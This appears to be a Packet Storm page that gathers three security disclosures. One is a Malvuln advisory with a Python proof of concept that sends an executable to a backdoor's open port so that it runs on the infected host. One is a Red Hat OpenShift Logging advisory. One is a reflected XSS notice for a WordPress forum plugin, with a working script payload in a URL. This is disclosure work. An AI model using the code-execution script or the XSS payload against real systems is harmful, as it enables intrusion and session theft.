    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/94ccd337cbdd4efbbcc0a6c888abb87d.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Augudor.bVulnerability: Remote File Write Code Execution Description: The malware drops an empty file named "zy.exe" and listens on TCP port 810. Third-party adversaries who can reach the infected host can write executable code to the empty "zy.exe" file on the system via a socket program and it will execute as soon as the binary transfer has completed. Successfully tested with a 880 byte executable.Family: AugudorType: PE32MD5: 94ccd337cbdd4efbbcc0a6c888abb87d Vuln ID: MVID-2022-0644Dropped files: zy.exeDisclosure: 09/25/2022Exploit/PoC:from socket import *MALWARE_HOST="x.x.x.x"PORT=810DOOM="DOOM_SM.exe" #880 bytesdef doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Augudor.b MVID-2022-0644 Code Execution

Red Hat Security Advisory 2022-6560-01 - An update is now available for OpenShift Logging 5.3.12 Red Hat Product Security has rated this update as having a security impact of Moderate.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Openshift Logging Bug Fix Release and Security Update (5.3.12)  
Advisory ID:       RHSA-2022:6560-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6560  
Issue date:        2022-09-26  
CVE Names:         CVE-2015-20107 CVE-2022-0391 CVE-2022-21123   
                   CVE-2022-21125 CVE-2022-21166 CVE-2022-29154   
                   CVE-2022-30631 CVE-2022-32206 CVE-2022-32208   
                   CVE-2022-34903   
=====================================================================

1. Summary:

An update is now available for OpenShift Logging 5.3.12

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Openshift Logging Bug Fix Release (5.3.12)

Security Fix(es):

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For OpenShift Container Platform 4.9 see the following documentation, which  
will be updated shortly, for detailed release notes:

https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html

For Red Hat OpenShift Logging 5.3, see the following instructions to apply  
this update:

https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

5. References:

https://access.redhat.com/security/cve/CVE-2015-20107  
https://access.redhat.com/security/cve/CVE-2022-0391  
https://access.redhat.com/security/cve/CVE-2022-21123  
https://access.redhat.com/security/cve/CVE-2022-21125  
https://access.redhat.com/security/cve/CVE-2022-21166  
https://access.redhat.com/security/cve/CVE-2022-29154  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/cve/CVE-2022-32206  
https://access.redhat.com/security/cve/CVE-2022-32208  
https://access.redhat.com/security/cve/CVE-2022-34903  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzGfoNzjgjWX9erEAQhCjxAAgzlIinDNawReUfoKAlsDPbKIc8xMDbUc  
ZnCVYDqXaO+31Cbz7wfOUczVoH1GdYwZovnvOF80NzErNglScay54z3NKrT9oaBq  
EjYHEmlmtX7oVsSugqIu9ZDjs3TXqiOrqdajZq90QPfyFLzaPzLsdK8ehav7ceWB  
Mf9XF8HtNvo+kNcR/Q3Hb6Ky7aR+13dGjjvnE9N/QLnAnYnZKxuU0cnoZhipO08D  
NyN3Gl3jij7tIioPJhMGkj2Wk1qjJ38Kf3lEhPR1sLA7zj5deFYRNdKHzlNt/BXu  
tAy8zfbnul5aLSTg6bxSTE/Hz/PFFuMvrA/A6Zd+NXcqz+L97ckDGyhp3KpuuweF  
GoEx4J2Gm8vTgUeolylDuqnQu9o2MZInHAFu/ytdYXGocf0sj74kls0XsuRYayjz  
RJD3TzacuQ3qHQpmcshStkOqsf4R8ku1EqI9ujX2qu9xqDY8p9kCcUH/oOviqxQY  
o2Jw3gP7qBrGAnN3q6G8lv8yN8DptAmPZWhEbZYUgg7PAFg9XyDbWx5y++bO9HF5  
9sbcRxJUKE95GGQKqzlKu2qLzOkr3GU+VJlRCFE3YEsEmsT5OizcanxWfQTo1xfE  
NTfz4K4YmSyGoAHpK3VVY1LeYPGkn1JEYm9YUDo7M1lSWhB6woUSaemzOKjo7q5l  
2sPnYAn2mZY=  
=BEHo  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6560-01

WordPress Forym plugin version 1.5.7 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : forym.xyz                                                                  ││  Vendor   : codecanyon.net                                                             ││  Software : Forym 1.5.7 - Modern Discussion Forum for Wordpress                        ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 's' is vulnerable to XSShttps://forym.xyz/?s=ax0zq%22%3e%3cscript%3ealert(1)%3c%2fscript%3efkdbh[-] Done

Source

Packet Storm